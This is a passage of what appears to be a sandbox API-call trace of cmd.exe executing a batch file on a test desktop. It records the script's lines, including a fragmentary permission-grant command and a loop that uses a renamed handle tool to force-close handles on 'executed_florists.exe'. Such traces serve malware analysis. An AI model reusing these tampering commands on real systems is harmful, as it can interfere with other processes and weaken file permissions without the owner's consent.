lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0157.927] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0157.927] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0157.927] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0157.927] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0157.927] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0157.927] _wcsicmp (_String1="set", _String2="CD") returned 16 [0157.927] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0157.927] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0157.927] _wcsicmp (_String1="set", _String2="REN") returned 1 [0157.927] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0157.927] _wcsicmp (_String1="set", _String2="SET") returned 0 [0157.928] GetConsoleTitleW (in: lpConsoleTitle=0x2cebc4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.928] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0157.928] SetEnvironmentVariableW (lpName="FN", lpValue="\"executed_florists.exe\"") returned 1 [0157.928] GetProcessHeap () returned 0x2f0000 [0157.928] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308178 | out: hHeap=0x2f0000) returned 1 [0157.928] GetEnvironmentStringsW () returned 0x306b30* [0157.929] GetProcessHeap () returned 0x2f0000 [0157.929] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb92) returned 0x3076d0 [0157.929] FreeEnvironmentStringsW (penv=0x306b30) returned 1 [0157.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0157.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0157.930] SetConsoleInputExeNameW () returned 0x1 [0157.930] GetConsoleOutputCP () returned 0x1b5 [0157.931] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0157.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0157.932] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0157.932] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.932] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0157.932] GetProcessHeap () returned 0x2f0000 [0157.932] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3042a0 | out: hHeap=0x2f0000) returned 1 [0157.932] GetProcessHeap () returned 0x2f0000 [0157.932] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304258 | out: hHeap=0x2f0000) returned 1 [0157.932] GetProcessHeap () returned 0x2f0000 [0157.933] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304210 | out: hHeap=0x2f0000) returned 1 [0157.933] GetProcessHeap () returned 0x2f0000 [0157.933] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0db8 | out: hHeap=0x2f0000) returned 1 [0157.933] GetProcessHeap () returned 0x2f0000 [0157.933] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3041b0 | out: hHeap=0x2f0000) returned 1 [0157.933] GetProcessHeap () returned 0x2f0000 [0157.933] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304170 | out: hHeap=0x2f0000) returned 1 [0157.933] GetProcessHeap () returned 0x2f0000 [0157.933] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2f0000) returned 1 [0157.933] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.933] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0157.933] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0xa3, lpOverlapped=0x0) returned 1 [0157.934] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0157.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0157.934] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.934] GetFileType (hFile=0x78) returned 0x1 [0157.934] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.934] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0157.934] GetProcessHeap () returned 0x2f0000 [0157.934] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0157.935] GetProcessHeap () returned 0x2f0000 [0157.935] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x70) returned 0x2f1230 [0157.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x2ce770, lpFilePart=0x2ce768 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2ce768*="Ch81ANBE.bat") returned 0x32 [0157.935] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x304170 [0157.936] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x304170 [0157.936] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.936] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0157.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x304170 [0157.936] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x304170 [0157.937] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.937] GetProcessHeap () returned 0x2f0000 [0157.937] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x56) returned 0x304170 [0157.937] GetProcessHeap () returned 0x2f0000 [0157.938] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0157.940] _tell (_FileHandle=3) returned 78 [0157.940] _close (_FileHandle=3) returned 0 [0157.940] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cedb4 | out: _Buffer="\r\n") returned 2 [0157.940] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.940] GetFileType (hFile=0x7) returned 0x2 [0157.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.940] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced74 | out: lpMode=0x2ced74) returned 1 [0157.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.941] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceda0*=0x2) returned 1 [0157.943] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0157.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.943] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cedb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0157.943] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cedb0 | out: _Buffer=">") returned 1 [0157.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.943] GetFileType (hFile=0x7) returned 0x2 [0157.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced78 | out: lpMode=0x2ced78) returned 1 [0157.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.944] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceda4*=0x26) returned 1 [0157.945] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.945] GetFileType (hFile=0x7) returned 0x2 [0157.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.945] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceffc | out: lpMode=0x2ceffc) returned 1 [0157.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.946] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f0dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf028, lpReserved=0x0 | out: lpBuffer=0x2f0dc0*, lpNumberOfCharsWritten=0x2cf028*=0x2) returned 1 [0157.946] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf034 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0157.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.946] GetFileType (hFile=0x7) returned 0x2 [0157.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.947] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0157.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.947] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x2d) returned 1 [0157.949] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0157.949] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.949] GetFileType (hFile=0x7) returned 0x2 [0157.950] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.950] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0158.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.413] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0160.004] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0160.004] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0160.004] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0160.005] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0160.005] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0160.005] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0160.005] GetConsoleTitleW (in: lpConsoleTitle=0x2cebc4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.714] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ce980, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ce978, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ce978*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x2ce71c, lpFilePart=0x2ce718 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x2ce718*=0x0) returned 0x26 [0162.716] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0162.716] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ce498 | out: lpFindFileData=0x2ce498*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3044b0 [0162.716] FindClose (in: hFindFile=0x3044b0 | out: hFindFile=0x3044b0) returned 1 [0162.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ce498 | out: lpFindFileData=0x2ce498*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3044b0 [0162.716] FindClose (in: hFindFile=0x3044b0 | out: hFindFile=0x3044b0) returned 1 [0162.716] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0162.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ce498 | out: lpFindFileData=0x2ce498*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3044b0 [0162.717] FindClose (in: hFindFile=0x3044b0 | out: hFindFile=0x3044b0) returned 1 [0162.717] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0162.717] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0162.717] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0162.717] GetProcessHeap () returned 0x2f0000 [0162.717] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3076d0 | out: hHeap=0x2f0000) returned 1 [0162.718] GetEnvironmentStringsW () returned 0x306b30* [0162.718] GetProcessHeap () returned 0x2f0000 [0162.718] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb92) returned 0x3076d0 [0162.718] FreeEnvironmentStringsW (penv=0x306b30) returned 1 [0162.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0162.718] GetProcessHeap () returned 0x2f0000 [0162.718] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304450 | out: hHeap=0x2f0000) returned 1 [0162.718] GetProcessHeap () returned 0x2f0000 [0162.718] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3043f0 | out: hHeap=0x2f0000) returned 1 [0162.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0162.720] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.720] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0162.720] SetConsoleInputExeNameW () returned 0x1 [0162.720] GetConsoleOutputCP () returned 0x1b5 [0162.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0162.721] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0162.722] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0162.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0162.722] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0162.722] GetProcessHeap () returned 0x2f0000 [0162.722] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304380 | out: hHeap=0x2f0000) returned 1 [0162.722] GetProcessHeap () returned 0x2f0000 [0162.722] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304310 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3042a0 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304230 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0db8 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3041d0 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304170 | out: hHeap=0x2f0000) returned 1 [0162.723] GetProcessHeap () returned 0x2f0000 [0162.723] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2f0000) returned 1 [0162.724] _get_osfhandle (_FileHandle=3) returned 0x78 [0162.724] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0162.724] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0x94, lpOverlapped=0x0) returned 1 [0162.725] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0162.726] _get_osfhandle (_FileHandle=3) returned 0x78 [0162.726] GetFileType (hFile=0x78) returned 0x1 [0162.726] _get_osfhandle (_FileHandle=3) returned 0x78 [0162.726] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0162.726] GetProcessHeap () returned 0x2f0000 [0162.726] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0162.727] GetProcessHeap () returned 0x2f0000 [0162.727] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4008) returned 0x318b20 [0162.730] GetProcessHeap () returned 0x2f0000 [0162.730] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f0db8 [0162.730] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"executed_florists.exe\"") returned 0x17 [0162.730] GetProcessHeap () returned 0x2f0000 [0162.730] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0db8 | out: hHeap=0x2f0000) returned 1 [0162.730] GetProcessHeap () returned 0x2f0000 [0162.730] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x318b20 | out: hHeap=0x2f0000) returned 1 [0162.730] GetProcessHeap () returned 0x2f0000 [0162.730] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0162.741] _tell (_FileHandle=3) returned 226 [0162.742] _close (_FileHandle=3) returned 0 [0162.742] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cedb4 | out: _Buffer="\r\n") returned 2 [0162.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.742] GetFileType (hFile=0x7) returned 0x2 [0162.743] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.743] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced74 | out: lpMode=0x2ced74) returned 1 [0162.743] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.743] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceda0*=0x2) returned 1 [0162.744] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0162.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0162.744] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cedb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0162.744] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cedb0 | out: _Buffer=">") returned 1 [0162.744] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.744] GetFileType (hFile=0x7) returned 0x2 [0162.745] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.745] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced78 | out: lpMode=0x2ced78) returned 1 [0162.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.745] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceda4*=0x26) returned 1 [0162.746] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x2cf034 | out: _Buffer="FOR") returned 3 [0162.746] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.746] GetFileType (hFile=0x7) returned 0x2 [0162.747] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.747] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0162.748] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.748] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x3) returned 1 [0162.749] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2cf034 | out: _Buffer=" /F") returned 3 [0162.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.749] GetFileType (hFile=0x7) returned 0x2 [0162.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.750] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0162.750] _get_osfhandle 